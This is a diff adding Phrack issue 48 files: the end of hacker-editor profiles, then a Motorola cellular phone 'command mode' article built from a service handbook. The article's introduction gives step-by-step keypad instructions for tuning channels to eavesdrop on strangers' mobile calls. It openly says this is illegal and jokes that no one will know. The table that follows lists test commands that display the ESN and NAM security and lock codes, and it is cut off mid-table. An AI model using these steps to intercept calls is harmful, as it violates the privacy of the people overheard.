+comp.protocols.tcpip, sci.crypt, alt.security.pgp and so on... 
+
+
+	zines...
+	--------
+	Oh yeah, I wrote some code and a few rag-tag articles for some Zines 
+out there.  Can't remember the names...
+ 
+
+	the Guild 
+	---------
+	The Guild is my group of roudy Internauts.  I started the group about
+20 months ago for several reasons, some of which are just *now* becoming 
+clear to me.  For a while there, we were putting out a zine, The Infinity 
+Concept, but that is on hiatus while I do Phrack.  Various members have done 
+coding and exploits.  Look for more to come from the Guild...
+
+
+	ftp.netcom.com/pub/da/daemon9
+	-----------------------------
+	Somewhere along the line about 2 years ago, I started to take 
+advantage of netcom's free 5 megs of ftp space.  I put together a modest
+collection of tools and whatnot (under 6 megs of stuff).  For some yet 
+undiscovered reason, people flocked to the site.  I have no clue why.  It 
+wasn't *that* great.  What I find even more fascinating is the fact that 
+to this day people *still* go looking there for hacking paraphenelia.
+The site has been vacated for almost a year now.  If you are reading this
+and still have a link to my O-L-D netcom ftp site, UPDATE it to point to
+ftp.infonexus.com.  I am *much* more proud of this site...  Hundreds of megs
+of top-notch stuff here.  Anyway, the netcom site went down because Brian 
+Smith (at the time the only member of the netcom security staff) told me I
+couldn't have certian tools there for distro.  When I ignored him, he froze
+my account.  This was the final catalyst in me deciding to start the 
+Information Nexus...
+
+
+	the Information Nexus
+	---------------------
+	Ah yes... The InfoNexus...  My frustration with Netcom led me to do 
+what I had been wanting to do for some time, start my own site.  This site
+would be a Haven for hackers, a place where they could come and be sure to 
+find only the finest in technologies and tools.  A place of much learning and
+information trade.  A knowledge dumping ground.  Thus was born the Information
+Nexus.  With anywhere from 6-10 machines the Nexus is a heterogenous 
+environment: the OS's range from several Unix flavors, several versions of 
+Windows NT, and, of course, the mundane stuff (like DOS/WFW).  The main box,
+Onyx, is a heavily tweaked Linux machine.  It is a P120 with 32MB RAM and 2
+GIGs of HD space.
+	As it stands now, accounts are given on restricted basis, only to 
+friends and people I know (or people whose reputation precedes them).  As soon
+as I upgrade the link from a 28.8 modem I will start offering accounts to the 
+masses, at a nomial fee.  I will also open up ftp access, allowing a greater 
+number of users at all hours.
+
+
+	The Infinity Concept
+	--------------------
+	TIC is the zine the Guild put out.  Some of the noteworthy subjects 
+written on: Cryptography, Windows NT security,  Unix security,the security 
+of PGP, and several coding projects...   We have done 3 issues to date, but
+I have stopped further production of the zine to devote my full attention to
+Phrack magazine.
+
+
+	Phrack Magazine
+	---------------
+	Several months back, I hopped on IRC with some of my Guild-mates and
+was having a wonderous discussion on, oh, nothing.  Well, Voyager was on, and
+he dragged me into a private chat.  He told me about ErikB stepping down, and
+told me he and ReDragon were to take over as the new editors...  I was very 
+happy for him, and told him  I would have jumped at the chance to do it.  That 
+was his next question...  Since then, ReDragon, Voyager and I have been 
+salivating like dogs waiting to get our hands on the legend that is Phrack 
+Magazine.  
+	My pledge is twofold: Timely distribution and nothing but the highest
+quality articles.  We will be distributing Phrack on a regular seasonal 
+rotation and will weed out all but the top-notch articles.  I plan to write
+at least one article per issue.  I promise this much: You will not be 
+disappointed...
+
+
+-----------------------------------------------------------------------------
+
+                              Prophile on ReDragon
+
+
+Personal
+~~~~~~~~
+
+              Handle: ReDragon
+            Call Him: Dave
+        Past Handles: Dr. Disk (circa '84), The Destroyer (circa '88)
+       Handle Origin: Thomas Harris Book, Saab insignia, D&Dish sort of
+                      name, then I decided it would be cooler (and original)
+                      if it was all one word and one D.
+       Date of Birth: 12/30/75
+ Age of current date: do the math yourself
+              Height: 5' 11"
+              Weight: 175
+           Eye Color: Green
+          Hair Color: Brown
+           Computers: Apple ][e, Atari 800, 8088, 386sx/16, 386dx/40, and
+                      right now a 486/33
+------------------------------------------------------------------------------
+   I got my Hayes Micromodem //e in the summer of '84.  I was eight years old
+and with the help of my babysitter begged my way onto an H/P board.  I used
+to read Phrack and write BASIC code, I was quite the clueless newbie for a
+while.  People say age doesn't matter, but it does when you are that young.
+My lameness continued, I learned Pascal, the years passed, and I started to
+figure out how things worked.  I discovered Unix, it was cool.  I learned
+what Crack was, I used it.  Years passed I started to figure out how things
+worked.  I would go into more detail but I don't really care to tell the 
+world about my life, ask me privately if you care.
+
+
+ReD's Favorite Things
+~~~~~~~~~~~~~~~~~~~~~
+         Women:  yes
+          Cars:  Saab
+         Foods:  Taco Bell (doesn't everyone?), Young animals killed cruely
+         Music:  Pink Floyd, Beatles, anything not techno
+       Leisure:  IRC is bad for you, just say no.
+ Alcoholic Fun:  Bottled beer, Jaegermeister, Long Island Iced Teas
+
+
+Most Memorable Experiences
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Saab car trouble in Queens on the way to HOPE.
+Saab car trouble on PA Turnpike on way back from Pumpcon.
+Saab stranded on George Washington Bridge on way to SummerCon '95.
+Saab finally breaks down on NY Turnpike on way home.
+SummerCon '95 (memorable that I don't remember any of it)
+SummerCon '96 (the worst organized con I have ever been to)
+
+
+Some People To Mention
+~~~~~~~~~~~~~~~~~~~~~~
+
+The Green Machine (for altering my life more than I can imagine)
+Acker (even though you gave up on it all, wish I knew what you were doing now)
+Bluesman (why didn't you tell me about C earlier?)
+Zorgo (for ruining my life showing me IRC)
+Wozz (I still don't believe you grew up there)
+r00t (you're all a bunch of idiots, but i love you)
+Asriel (we are pretty similar people, except I'm not a narq)
+Max-Q (screaming at me "Nice Fuckin' Con!" after Summercon '96, I was touched)
+Taran King (you were cool to me when I was nobody, I was impressed)
+Sirsyko (only hacker I know that I actually trust)
+ErikB (annoying him enough made for an interesting summercon and a new phrack)
+l0pht (for bringing back what hacking is really about)
+b (stuff?)
+
+Why Phrack?
+~~~~~~~~~~~
+
+   I have been in one way or another involved in the "hack scene" for more 
+than half my life.  I spent a large part of that on the lower end of the
+knowledge ladder, and throughout it all few people helped me along directly.
+What I recognize though is that there have been scores of people that have
+spent their time, at no personal gain to themselves, to help educate others
+about something that they know a bit more about than the rest of us. 
+   I read a lot of books to learn about hacking; I paid for them and the
+authors have gotten the money they deserve.  I learned quite a bit from
+college; I paid quite a lot for college.  But I have learned about hacking
+most of all from hackers.  How can I repay those that have given me so much?
+   We are rather fortunate to be in a position where we actually can give 
+something back to them.  We can give them a new generation of hackers that
+have the same opportunities to learn and to share their knowledge that we
+had.  We can show them that we haven't forgotten about where we started; we
+haven't forgotten about why we are hackers; and we haven't forgotten that
+to be a hacker is a passion, and it is something we are proud of.  
+   To my peers, consider giving something back to the community.  To the next
+generation, learn from what we give and explore from what you learn; it will
+soon be your turn to take our place.  And to those that made this all possible,
+to those that gave their own knowledge in the name of the community, the
+hundreds of authors, the ten editors, and most of all the readers: Thank You.
+
+                                                  -ReDragon
+
+-----------------------------------------------------------------------------
+
+
+                              Prophile on Voyager
+
+Personal
+~~~~~~~~
+           Handle:  Voyager
+         Call him:  Will
+    Date of Birth:  06/23/69
+              Age:  27
+           Height:  6'
+           Weight:  200lb
+  Computers owned:  486DX4-100(FreeBSD), 486SX25(OS/2) and P-75 laptop(PC-DOS)
+
+
+How did this handle originate?  I jumped on IRC one day and didn't want
+to use my real handle, so I made this one up on the spur of the moment.
+
+
+How I Got Started
+~~~~~~~~~~~~~~~~~
+I didn't start hacking computers until I went to college.  I taught
+myself to use PRIMOS and I started hacking because the 150k disk quota I
+was given wasn't large enough for me to compile decent sized programs.
+
+I started hacking in '87 and didn't run into another hacker until '91.
+I got Internet access and I found Phrack on ftp.eff.org.  Wow!  I
+thought, these people are serious.  Shortly thereafter, I compiled the
+VMS client for IRC and I was talking to other hacker types on a regular
+basis.
+
+About that time, I put up a BBS.  The system is now known as "Hacker's
+Haven."  The system has become fairly popular, with over 1,400 users
+surviving the last 90 day purge.
+
+In '92, I wrote a "bot" in the IRC scripting language and called it
+"HackSrv." HackSrv distributed H/P files on demand and also opped all of
+us regular #hack cronies.
+
+Late in '92 I moved to Atlanta and started organizing 2600 Meetings.  We
+had a blast.  We held them at my apartment.  I can't imagine what my
+neighbors thought.  I still remember 40 people in my tiny living room
+huddled around the TV watching sneakers.  One week, we were hacking on
+one terminal, IRC'ing on another, watching a lockpicking demo on the
+front door, sorting trash on the balcony, having firearms instruction in
+the bedroom, and setting off bottle rockets from the kitchen to the
+living room.  The last is not a good idea, by the way.
+
+Over the course of the next few years, #hack went completely to hell.
+The place became littered with clueless newbies asking clueless newbie
+questions.  Other people, usually even less clueful newbies, would kick
+and ban people for asking questions.  This effectively stopped all useful
+conversation on #hack, as anyone who brought up a technical topic was 
+likely to be kicked immediately.  This led to a group of #hack ChanOp's
+who had absolutely no technical knowledge and instead wasted away the 
+hours stroking their egos.  I was annoyed by the incredible cluelessness 
+that had taken over the once fine channel and decided to do something 
+about it.
+
+Towards that end, I wrote the #hack FAQ.  The #hack FAQ was to be given
+to new people to bring them up to speed in a short amount of time.  This, 
+I reasoned, would raise the intellectual level on conversation on #hack.
+It would also set the tone for conversation on #hack back to the technical
+atmosphere I had known just a few years earlier.  Later, the #hack FAQ 
+became the alt.2600/#hack FAQ and it's purpose was expanded to cover 
+the newsgroup alt.2600.
+
+In the Summer of '94 I moved to Denver and joined up with TNO.  TNO is a
+group of friends who share an avid interest in computer and telephone
+security.  Today, TNO consists of Cavalier, DisordeR, Major, Edison and
+myself.
+
+Over the last few years, I've written for Phrack, 2600, CoTNo and FUCK.
+I've wanted to be Phrack editor since Taran King retired.  When ErikB
+told me he was looking to retire from the job, and that I was being
+considered as the next Phrack editor, it hit me just how big of a
+responsibility this was.  I spoke with ReDragon (Editor of FEH) and
+daemon9 (Editor of The Infinity Concept).  Together, we agreed to set
+aside our current e-zine's (I was the current Editor of CoTNo) and focus
+all of our attention on Phrack.  We have received offers of support from
+many old and new people in the hacking community.  I am looking forward
+to a bright future for Phrack.
+
+
+Interests
+~~~~~~~~~
+              Women:  Sharp and quick
+               Cars:  Big and fast
+               Food:  Spicy to the point of pain
+              Music:  Rock and Roll
+Favorite performers:  Jimmy Buffett, The Eagles
+    Favorite author:  Joel Rosenberg
+      Favorite Book:  Unix Power Tools
+
+
+Most Memorable Experiences
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+KL kicking me off #hack for saying that hacking was wrong.
+
+Captain Hemp hiding my address and phone number in a bag of trash.
+
+Reading my first sniffer log.
+
+Getting arrested with Captain Hemp outside of a Southern Bell facility.
+
+Finding the switch with the unpassworded root account.
+
+Being pulled over on the way to HoHoCon while we were moshing in the
+van.
+
+DeadKat and Cavalier doing the root dance.
+
+Being followed by the security guard with the baby seat.
+
+Major and I *not* getting mugged and beaten by the gang of thieves, even
+though he could barely stand up and neither of us were carrying at the
+time.
+
+
+Some People To Mention
+~~~~~~~~~~~~~~~~~~~~~~
+
+Major :         You are, at the same time, one of the best people I have
+                ever known and one of the worst people I have ever
+                known.  I am just glad I am on your side, and you mine.
+                I trust you with my life, and with a few of the 
+		situations we've been through, that's not just talking.
+
+Cavalier :      You taught us all what was important in a group.  Your
+                steadiness and common sense has helped carry TNO through
+                the dark times.  As always, I'm glad to have you here.
+                You can always be counted on, and that means a great
+                deal to me.
+
+The Presence :  It is always a pleasure to talk to you.  You have taught
+                me more than anyone else in the scene.  You will always
+                be one of the best.  The strength of your ethics will
+                guide you through where lesser men would fail.
+
+Captain Hemp :  There's no one I'd rather be arrested with.
+
+NoCar / K :     Congratulations on your new system!
+
+
+The Final Question
+~~~~~~~~~~~~~~~~~~
+I have met quite a few hackers.  Very few have been "geeks" in the
+traditional sense of the term.  I have met hacker business people,
+hacker jocks, hacker criminals, hacker stoners, hacker programmers, and
+hacker skater punks.  It's a sport for just about anyone with
+intelligence, dedication, and absolutely no respect for authority.
+
+_______________________________________________________________________________
+
diff --git a/phrack48/6.txt b/phrack48/6.txt
new file mode 100644
index 0000000..80f68ea
--- /dev/null
+++ b/phrack48/6.txt
@@ -0,0 +1,596 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 6 of 18
+
+
+                      Motorola Command Mode Information
+
+                      Written and typed up by Cherokee
+ 
+
+
+NOTE: The following text is only a few pages from an official Motorola
+      handbook that I received, thanks to Ob1.
+      
+                        THIS IS NOT A COMPLETE HANDBOOK 
+      
+      but it is very useful as a guide to learning how to use the self
+      test instructions on the Motorola series of cellular phones.
+
+      To actually enter the self test modes, THERE ARE SEVERAL STAGES
+      BEFORE HAND THAT NEED TO BE DONE.  They depend upon what type of
+      Motorola mobile phone you possess.  To my knowledge, the self test
+      mode instructions are the same on every Motorola phone, the only
+      difference will be how you enter the test mode. That I leave up to
+      you to find out as there are lots of help files already out there,
+      unless, there is a great demand for it.
+
+      I will now show you how easy it is to use the test mode to your
+      advantage.
+
+      Say, your the average peeping Tom or Sally (what hacker isn't?),
+      this is how to listen in on other peoples mobile conversations.
+
+      1.Enter the test mode.
+      2.Turn the speaker on (08#) also called un-muting the receive audio. 
+      3.Tune into a channel(11xxxx#) (where x can range from 0 to
+      600[TACS] and 1329 to 2047[ETACS].)... Although I'm not 100% sure
+      of the channel mapping, (theres conversations in the range between
+      600 to 1329), you'd do best to stick to playing around with these.
+
+      You may have to try several different channels, to pick up a
+      conversation, not every channel is occupied with a user.  I
+      suggest you try 0 to 50, this is almost guaranteed to give you a
+      result. BTW, it is actually illegal to monitor mobile
+      communications without the consent of both parties, but hey, whose
+      going to know? :-)
+
+      Displaying information - Some handsets only allow display 1 line,
+      and therefore you wont be able to see all of the information being
+      sent to you. There are 2 ways around this. 1. Is to go and get a
+      handset which can display 2 lines of information. 2. to send the
+      data to your computer to display on the screen, apparently the
+      data is sent and received in an unfamiliar packet format, and will
+      need to be decoded.
+
+      FINAL NOTE: 
+      There are several conflicting sources for some commands, this is
+      because of different versions of the ROM, so I'm putting all of
+      the test codes bundled together in this file, and will update the
+      list if there are any significant changes, or I find out about a
+      new command in a later ROM version.
+
+      Just one last final note to say hi to Davex[thanks for the NAM
+      guide], Ratscabies, Maelstrom, Hi.T.Moonweed and Ob1.
+
+ ----------------------------------------------------------------------------
+
+                     Motorola Self Test Mode Instructions
+                     ------------------------------------
+
+
+1. INTRODUCTION
+
+Portable radio telephones are equipped for self-test, allowing service
+personnel to control and monitor radiotelephone functions via the
+telephone keypad.  The self-test mode operates at two levels:
+
+1) a status display level, which allows the portable telephone to
+operate normally while providing status indications in the display and;
+
+2) the service level, which removes the portable telephone from normal
+service and allows commands to be entered through the keypad to
+'manually' control the operation of the radiotelephone.
+
+2. OPERATING PROCEDURES
+
+2.1 STATUS DISPLAY LEVEL OF SELF-TEST
+
+This level of self-test is entered by momentarily shorting pin 6 of J2
+to ground, while turning the radiotelephone on.  The self-test mode can
+also be entered using the portable radiotelephone test kit (RTL4228A and
+RTL4229A).
+
+In this level of self-test mode the radiotelephone will place and
+receive calls as normal except the radiotelephone displays status
+information. The displayed status information alternates between the
+channel number and RSSI status information, and the primary status
+information (SAT frequency, carrier state, signaling tone state, power
+level, voice/data channel mode, and Rx and Tx audio states).  The format
+and explanation of this status information is given in Table 1 under 02#
+Radio Status Request.
+
+When dialing a phone number, the display of the status in formation
+ceases when the first digit of the phone number is entered.  When the
+Snd button (or End or Clr) is pressed, the status information display
+resumes.
+
+2.2 SERVICING LEVEL OF SELF-TEST
+
+  |-----------------------------------------------------------
+  |                             NOTE
+  |-----------------------------------------------------------
+  |     While in the servicing level mode of self-test, the
+  |     display does not alternate.  Only the primary status
+  |     information is displayed.
+  |-----------------------------------------------------------
+
+The servicing level allows the servicing personnel to take control of
+the radio operation by entering the test commands through the telephone
+keypad.  Such parameters as operating channel, output power level
+muting, and data transmission can all be selected by entering the
+corresponding commands.  The servicing level is entered from the status
+display level by pressing the (#) button.  At this time the radio
+telephones cease to function automatically in the radiotelephone system.
+Table 1 shows the test commands and the corresponding results.
+
+
+INTERNATIONAL CELLULAR PORTABLE
+
+Table 1. Test Commands For Self-Test Mode
+
+|---------------------------------------------------------------------------
+| NOTES:
+| 1. Each command consists of at least two digits entered from the telephone
+|    keypad with the entry terminated using the (#) key.
+| 2. If the command relates to a test function with multiple data displays,
+|    the (#) key is used to pause at scanning data or to step through
+|    sequential test functions.  Entering the (#) key during a pause time
+|    resumes scanning.
+| 3. For commands that initiate an action that requires a response or that 
+|    accumulates error counts, the (#) key terminates the test.
+|---------------------------------------------------------------------------
+|Keypad Entry | Command Description | Status  |        Result
+|             |                     | Display |
+|-------------|-------------------------------------------------------------
+|       #     |Enter Test Command   |         |
+|             |Mode                 |         |
+|-------------|---------------------|---------|-----------------------------
+|      01#    |Restart (Re-enter DC |         |
+|             |power startup routine|         |
+|-------------|---------------------|---------|-----------------------------
+|      02#    |Radio Status Request | AAAA=BB | AAAA=Channel Number(decimal)
+|             |                     |         | BB=RSSI reading for channel
+|             |                     | CDEFGHI |   C=SAT Frequency
+|             |                     |         |      0=5970 Hz
+|             |                     |         |      1=6000 Hz
+|             |                     |         |      2=6030 Hz
+|             |                     |         |      3=No Lock
+|             |                     |         |   D=Carrier(1=ON)
+|             |                     |         |   E=Signaling Tone(1=ON)
+|             |                     |         |   F=Power Attention Level(0-7)
+|             |                     |         |   G=Mode(1=control channel
+|             |                     |         |     0=voice channel
+|             |                     |         |   H=Receive Audio Mute(1=muted)
+|             |                     |         |   I=Transmit Audio Mute(1=muted)
+|             |                     |         | When the radiotelephone is
+|             |                     |         | operating in the status display
+|             |                     |         | level of self-test, the
+|             |                     |         | information that is displayed
+|             |                     |         | alternates between AAAA BB
+|             |                     |         | and CDEFGHI.  In the servicing
+|             |                     |         | level of self-test, only the
+|             |                     |         | information designated by
+|             |                     |         | CDEFGHI is displayed.
+|-------------|---------------------|---------|-----------------------------
+|      03#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      04#    | Initialize          |         | Carrier=OFF
+|             | Transceiver         |         | Power Level=0
+|             |                     |         | Receive Audio=MUTED
+|             |                     |         | Transmit Audio=MUTED
+|             |                     |         | Signaling Tone=OFF
+|             |                     |         | SAT=OFF
+|             |                     |         | DTMF & Audio Tones=OFF
+|             |                     |         | Audio Path=TO SPEAKER
+|-------------|---------------------|---------|-----------------------------
+|      05#    | Carrier On          |         | Turn carrier on
+|-------------|---------------------|---------|-----------------------------
+|      06#    | Carrier Off         |         | Turn carrier off
+|-------------|---------------------|---------|-----------------------------
+|  NOTE: Use the PATH command (35A#) to select the audio path to test before
+|  using commands 07# through 10#.
+|-------------|---------------------|---------|-----------------------------
+|      07#    | Rx Mute             |         | Mute the receive audio
+|-------------|---------------------|---------|-----------------------------
+|      08#    | Rx Un-mute          |         | Un-mute the receive audio
+|-------------|---------------------|---------|-----------------------------
+|      09#    | Tx Mute             |         | Mute the transmit audio
+|-------------|---------------------|---------|-----------------------------
+|      10#    | Tx Un-mute          |         | Un-mute the transmit audio
+|-------------|---------------------|---------|-----------------------------
+|    11ABCD#  | Load Synth          |         | Load synthesizer with ABCD
+|             |                     |         | where ABCD =  channel number
+|             |                     |         | in decimal (1329-2047, 0-600)
+|-------------|---------------------|---------|-----------------------------
+|      12#    | Set ATTN            |         | Set RF power attention to A
+|             |                     |         | where A=attention level(0-7;
+|             |                     |         | 0=maximum power)
+|-------------|---------------------|---------|-----------------------------
+|      13#    | RESET OFF           |         | This command should cause the
+|             |                     |         | Logic Unit to set WATCH DOG
+|             |                     |         | low and result in power-down
+|             |                     |         | of the radiotelephone.
+|-------------|---------------------|---------|-----------------------------
+|      14#    | STON                |         | Transmit signaling tone 10khz
+|-------------|---------------------|---------|-----------------------------
+|      15#    | STOFF               |         | Stop transmitting signaling 
+|             |                     |         | tone 10khz
+|-------------|---------------------|---------|-----------------------------
+|      16#    | SETUP               |         | Transmit a five word reverse
+|             |                     |         | control channel message; each
+|             |                     |         | of the five words will be
+|             |                     |         | "FF00AA55CC33".  The trans-
+|             |                     |         | mitter de-keys at end of 
+|             |                     |         | message
+|-------------|---------------------|---------|-----------------------------
+|      17#    | VOICE               |         | Transmit a two word reverse
+|             |                     |         | voice channel message; both
+|             |                     |         | words will be "FF00AA55CC33".
+|             |                     |         | The transmitter de-keys at end
+|             |                     |         | of message.
+|-------------|---------------------|---------|-----------------------------
+|      18#    | SEND NAM            |         | AA = Address    BB = Data
+|             |                     |         | Displays contents of NAM, one
+|             |                     |         | address at a time, advanced
+|             |                     |         | by pressing the (*) key.
+|             |                     |         | Note the address goes up to 1f
+|-------------|---------------------|---------|-----------------------------
+|      19#    | VERSION             |         | Displays software version
+|             |                     |         | number as "year, week"
+|-------------|---------------------|---------|-----------------------------
+|  NOTE: Entering commands 20# through 23# or 27# causes the transceiver to
+| begin a counting sequence or continuous transmission as described below.
+| In order to exit from the commands to enter another test command, the (#)
+| key must be depressed; all other key depressions are ineffectual.
+|---------------------------------------------------------------------------
+|      20#    | RCVS 1              |         | Receive control channel
+|             |                     |         | messages counting correctable
+|             |                     |         | and uncorrectable errors.
+|             |                     |         | When the command starts, the
+|             |                     |         | number of the command will be
+|             |                     |         | displayed in the right hand
+|             |                     |         | side of the display. Entering
+|             |                     |         | a # key will terminate the
+|             |                     |         | command and display a two
+|             |                     |         | three digit number in the
+|             |                     |         | display. The first number
+|             |                     |         | is the number of correctable
+|             |                     |         | errors and the second is the
+|             |                     |         | uncorrectable errors.
+|-------------|---------------------|---------|-----------------------------
+|      21#    | RCVV 1              |         | Receive voice channel
+|             |                     |         | messages counting correctable
+|             |                     |         | and uncorrectable errors.
+|             |                     |         | When the command starts, the
+|             |                     |         | number of the command will be
+|             |                     |         | displayed in the right hand
+|             |                     |         | side of the display. Entering
+|             |                     |         | a # key will terminate the
+|             |                     |         | command and display a two
+|             |                     |         | three digit number in the
+|             |                     |         | display. The first number
+|             |                     |         | is the number of correctable
+|             |                     |         | errors and the second is the
+|             |                     |         | uncorrectable errors.
+|-------------|---------------------|---------|-----------------------------
+|      22#    | WSTS                |         | Receive control channel
+|             |                     |         | messages counting word sync
+|             |                     |         | sequence. When the command
+|             |                     |         | starts, the number of the
+|             |                     |         | command will be displayed in
+|             |                     |         | the right side of the display.
+|             |                     |         | Entering a # key will 
+|             |                     |         | terminate the command and 
+|             |                     |         | display the number of word
+|             |                     |         | sync sequences in the display.
+|-------------|---------------------|---------|-----------------------------
+|      23#    | WSTV                |         | Receive voice channel
+|             |                     |         | messages counting word sync
+|             |                     |         | sequence. When the command
+|             |                     |         | starts, the number of the
+|             |                     |         | command will be displayed in
+|             |                     |         | the right side of the display.
+|             |                     |         | Entering a # key will 
+|             |                     |         | terminate the command and 
+|             |                     |         | display the number of word
+|             |                     |         | sync sequences in the display.
+|-------------|---------------------|---------|-----------------------------
+|      24#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|     25A#    | SATON               |         | Enable the transmission of
+|             |                     |         | SAT where A = SAT frequency.
+|             |                     |         | See chart below.
+|             |                     |         |        A     SAT Freq.
+|             |                     |         |        0      5970 Hz
+|             |                     |         |        1      6000 Hz
+|             |                     |         |        2      6030 Hz
+|-------------|---------------------|---------|-----------------------------
+|      26#    | SATOFF              |         | Disable the transmission of 
+|             |                     |         | SAT.
+|-------------|---------------------|---------|-----------------------------
+|      27#    | TRANSMIT DATA       |         | TX continuous control channel
+|             |                     |         | data.
+|-------------|---------------------|---------|-----------------------------
+|      32#    | CLEAR               |         | Clears non-volatile memory.
+|             |                     |         | Clears all stored numbers.
+|-------------|---------------------|---------|-----------------------------
+|      33#    | DTMF                |         | Turn DTMF on.
+|-------------|---------------------|---------|-----------------------------
+|      34#    | DTMF                |         | Turn DTMF off.
+|-------------|---------------------|---------|-----------------------------
+|      35#    | DISPLAY RSSI        |         | 'D' series portable only.
+|-------------|---------------------|---------|-----------------------------
+|     35A#    | SET AUDIO PATH      |         | Where A = the following...
+|             |                     |         | 1 = Speaker
+|             |                     |         | 2 = Microphone
+|             |                     |         | 3 = Earpiece
+|-------------|---------------------|---------|-----------------------------
+|      38#    | DISPLAY ESN         |         | Displays ESN in four steps,
+|             |                     |         | hit * till back at start.
+|-------------|---------------------|---------|-----------------------------
+|      41#    |  (NOT USED)         |         | Enables diversity.
+|-------------|---------------------|---------|-----------------------------
+|      42#    |  (NOT USED)         |         | Disables diversity.
+|-------------|---------------------|---------|-----------------------------
+|      43#    |  (NOT USED)         |         | Disables diversity.
+|-------------|---------------------|---------|-----------------------------
+|      44#    |  (NOT USED)         |         | Disables diversity.
+|-------------|---------------------|---------|-----------------------------
+|      45#    | READ RSSI           |         | Returns the RSSI reading
+|             |                     |         | taken on the current channel.
+|             |                     |         | The number is displayed as a
+|             |                     |         | three digit decimal number.
+|-------------|---------------------|---------|-----------------------------
+|      46#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|     47A#    | AUDLEV              |         | Set audio level where A=level
+|             |                     |         | (0=lowest, 15=highest). The
+|             |                     |         | normal level is 2.
+|             |                     |         | NOTE: Use 8 to 12 only for
+|             |                     |         | DTMF applications.
+|-------------|---------------------|---------|-----------------------------
+|      48#    | SIDETONE ON         |         | Enable sidetone(Command 05#
+|             |                     |         | must also be executed.
+|-------------|---------------------|---------|-----------------------------
+|      49#    | SIDETONE OFF        |         | Disable sidetone(Command 06#
+|             |                     |         | must also be executed.
+|-------------|---------------------|---------|-----------------------------
+|      50#    | MAINN               |         | Not normally used. Tests data
+|             |                     |         | transmission/reception with
+|             |                     |         | transmit path connected
+|             |                     |         | externally to receive path.
+|             |                     |         | Maintenance data is trans-
+|             |                     |         | mitted and test results 
+|             |                     |         | displayed:
+|             |                     |         | PASS= received data is correct
+|             |                     |         | FAIL=2-second timeout, no data
+|             |                     |         | received, or received data is
+|             |                     |         | incorrect.
+|-------------|---------------------|---------|-----------------------------
+|      51#    | MAINL               |         | Tests data paths internal to
+|             |                     |         | the logic unit, where
+|             |                     |         | maintenance data is trans-
+|             |                     |         | mitted and looped back. 
+|             |                     |         | Display is as follows:
+|             |                     |         | PASS= received data is correct
+|             |                     |         | FAIL=2-second timeout, no 
+|             |                     |         | looped-back data, or 
+|             |                     |         | looped-back data is incorrect.
+|-------------|---------------------|---------|-----------------------------
+|     52A#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      53#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      54#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      55#    | DISPLAY/PROGRAM     | NAM     | Displays the contents of the
+|             |                     |         | NAM, one step at a time, ad-
+|             |                     |         | vanced by depressing the (*)
+|             |                     |         | key. Only the last 7 digits
+|             |                     |         | of data are displayed. Refer
+|             |                     |         | to NAM programming instruct-
+|             |                     |         | ions in this manual for progr-
+|             |                     |         | amming details.
+|
+| 01.  02051        - System ID umber. Vodaphone=02051 Cellnet=03600
+| 02.  xxxxxxxx     - A option byte (in binary)
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Local use (bit A7) if set to 1 mobile will |
+|      |     0      | respond to local control orders in the home|
+|      |            | area. Assigned by system operator.         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Preferred system (bit A6) applies to units  |
+|      |     0      | capable of operating on two service systems|
+|      |            | 0 = system B   1 = system A                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | End-to-end signaling (bit A5) when enabled|
+|      |     1      | indicates mobile is equipped for DTMF via  |
+|      |            | the keys after the landline connection is  |
+|      |            | made.  1 = enabled   0 = disabled          |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |     0      | Bit not used (bit A4)                      |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Repertory (bit A3) indicates the mobile is |
+|      |     1      | equipped with speed-dialing storage.       |
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Aux alert (bit A2) when enabled, user can  |
+|      |     1      | place the mobile in aux alert mode and be  |
+|      |            | notified of incoming call via an aux device|
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | H/F auto mute (bit A1) when enabled, mobile|
+|      |     0      | will automatically be in the mute mode when|
+|      |            | a call is made using the hands-free mode   |
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Minmark (bit A0)supplied by system operator|
+|      |     0      | when enabled the users MIN2 will be sent   |
+|      |            | with each call initiated or answered.      |
+|      |            |  1 = enabled   0 = disabled                |
+|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+| 03.  xxxxxxxxxx   - Mobile phone number
+| 04.  xxxxxxxxxx   - 10 digit min
+| 05.  17           - Station class mark
+| 06.  09           - Access overload class (15 highest priority)
+| 07.  xxxxxx       - Security code
+| 08.  xxx          - Lock code
+| 09.  xxxxxxxx     - B option byte (in binary)
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |     0      | bit b7    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |     0      | bit b6    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
